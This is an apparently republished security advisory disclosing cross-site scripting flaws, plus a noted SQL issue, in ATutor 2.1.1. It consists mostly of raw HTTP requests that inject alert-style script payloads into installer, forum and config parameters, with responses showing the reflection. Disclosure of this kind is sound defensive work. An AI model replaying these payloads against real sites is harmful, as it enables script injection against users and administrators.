ATutor 2.1.1 Cross Site Scripting

2014.02.22
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| ATutor Multiple vulnerabilities # Version .| ATutor-2.1.1 # Date ....| 19.02.2014 # Found ...| HauntIT Blog # Home ....| https://atutor.ca # ============================================================== # ============================================================== # 1. During installation: xss and sql insertion: ---<request>--- POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 191 action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+ ---<request>--- ---<response>--- <ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully. ---<response>--- --> tb_prefix and new_version parameter are also vulnerable. # ============================================================== # 2. XSS ---<request>--- POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 667 action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB ---<request>--- Vulnerable to XSS are also parameters: step2%5Bnew_version%5D step2%5Bdb_host%5D step2%5Bdb_port%5D step2%5Bdb_login%5D step2%5Bdb_password%5D step2%5Bdb_name%5D step2%5Btb_prefix%5D # ============================================================== # 3. Persistent XSS (from admin) ---<request>--- POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 108 add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save ---<request>--- ---<response>--- <span class="required" title="Required Field">*</span><label for="title">Title</label><br /> <input type="text" name="title" size="40" id="title" value="'>"><body/onload=alert(9999)>" /> </div> ---<response>--- # ============================================================== # 4. Edit config (from admin user): ---<request>--- POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 946 site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top